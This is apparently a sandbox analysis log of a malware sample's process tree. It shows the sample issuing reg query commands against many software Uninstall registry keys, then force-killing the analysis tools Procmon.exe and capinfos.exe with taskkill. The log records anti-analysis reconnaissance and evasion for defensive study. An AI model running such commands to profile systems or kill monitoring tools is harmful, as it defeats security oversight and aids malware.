C:\Windows\system32\cmd.execmd.exe2⤵PID:1456
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:1860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:1628
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1560
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:1076
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1460
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1476
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:2020
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:304
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:456
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1952
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1564
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1056
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:672
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1472
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1912
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2012
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1612
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1060
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1968
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1768
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1520
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:1828
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1616
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1512
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1052
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1864
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:824
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1628
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1388
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1484
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:1476
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:528
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:1672
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:456
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:2028
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1472
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:1552
-